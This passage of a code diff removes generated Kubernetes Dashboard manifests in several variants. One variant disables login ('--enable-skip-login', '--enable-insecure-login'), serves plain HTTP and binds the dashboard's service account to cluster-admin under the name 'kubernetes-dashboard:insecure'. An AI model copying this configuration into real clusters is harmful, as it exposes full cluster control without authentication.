name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
spec:
replicas: 1
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
selector:
matchLabels:
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/component: kubernetes-dashboard
template:
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
spec:
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
containers:
- name: kubernetes-dashboard
image: "kubernetesui/dashboard:v2.3.1"
imagePullPolicy: IfNotPresent
args:
- --namespace=kubernetes-dashboard
- --metrics-provider=none
- --enable-skip-login
- --enable-insecure-login
ports:
- name: http
containerPort: 9090
protocol: TCP
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTP
path: /
port: 9090
initialDelaySeconds: 30
timeoutSeconds: 30
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
---
# Source: kubernetes-dashboard/templates/clusterrole-readonly.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/clusterrolebinding-readonly.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/ingress.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/networkpolicy.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/pdb.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/psp.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
creationTimestamp: null
name: kubernetes-dashboard:insecure
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard

View File

@@ -1,489 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
---
# Source: kubernetes-dashboard/templates/serviceaccount.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/secret.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# kubernetes-dashboard-certs
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-certs
type: Opaque
---
# Source: kubernetes-dashboard/templates/secret.yaml
# kubernetes-dashboard-csrf
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-csrf
type: Opaque
---
# Source: kubernetes-dashboard/templates/secret.yaml
# kubernetes-dashboard-key-holder
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-key-holder
type: Opaque
---
# Source: kubernetes-dashboard/templates/configmap.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: ConfigMap
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-settings
data:
---
# Source: kubernetes-dashboard/templates/clusterrole-metrics.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: "kubernetes-dashboard-metrics"
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
rules:
# Allow Metrics Scraper to get metrics from the Metrics server
- apiGroups: ["metrics.k8s.io"]
resources: ["pods", "nodes"]
verbs: ["get", "list", "watch"]
---
# Source: kubernetes-dashboard/templates/clusterrolebinding-metrics.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: "kubernetes-dashboard-metrics"
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/role.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
rules:
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster", "dashboard-metrics-scraper"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
verbs: ["get"]
---
# Source: kubernetes-dashboard/templates/rolebinding.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/service.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: Service
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
kubernetes.io/cluster-service: "true"
spec:
type: ClusterIP
ports:
- port: 443
targetPort: https
name: https
selector:
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/component: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/deployment.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: apps/v1
kind: Deployment
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
spec:
replicas: 1
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
selector:
matchLabels:
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/component: kubernetes-dashboard
template:
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
spec:
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
containers:
- name: kubernetes-dashboard
image: "kubernetesui/dashboard:v2.3.1"
imagePullPolicy: IfNotPresent
args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --metrics-provider=none
ports:
- name: https
containerPort: 8443
protocol: TCP
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
---
# Source: kubernetes-dashboard/templates/clusterrole-readonly.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/clusterrolebinding-readonly.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/ingress.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/networkpolicy.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/pdb.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
---
# Source: kubernetes-dashboard/templates/psp.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

View File

@@ -1,510 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
---
# Source: kubernetes-dashboard/templates/serviceaccount.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/secret.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# kubernetes-dashboard-certs
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-certs
type: Opaque
---
# Source: kubernetes-dashboard/templates/secret.yaml
# kubernetes-dashboard-csrf
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-csrf
type: Opaque
---
# Source: kubernetes-dashboard/templates/secret.yaml
# kubernetes-dashboard-key-holder
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-key-holder
type: Opaque
---
# Source: kubernetes-dashboard/templates/configmap.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: ConfigMap
metadata:
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
name: kubernetes-dashboard-settings
data:
---
# Source: kubernetes-dashboard/templates/clusterrole-metrics.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: "kubernetes-dashboard-metrics"
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
rules:
# Allow Metrics Scraper to get metrics from the Metrics server
- apiGroups: ["metrics.k8s.io"]
resources: ["pods", "nodes"]
verbs: ["get", "list", "watch"]
---
# Source: kubernetes-dashboard/templates/clusterrolebinding-metrics.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: "kubernetes-dashboard-metrics"
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/role.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
rules:
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster", "dashboard-metrics-scraper"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
verbs: ["get"]
---
# Source: kubernetes-dashboard/templates/rolebinding.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/service.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: Service
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
kubernetes.io/cluster-service: "true"
spec:
type: NodePort
ports:
- port: 443
targetPort: https
name: https
selector:
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/component: kubernetes-dashboard
---
# Source: kubernetes-dashboard/templates/deployment.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: apps/v1
kind: Deployment
metadata:
name: kubernetes-dashboard
labels:
app.kubernetes.io/name: kubernetes-dashboard
helm.sh/chart: kubernetes-dashboard-5.0.2
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/version: "2.3.1"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: kubernetes-dashboard
spec:
replicas: 1
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
selector:
matchLabels:
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
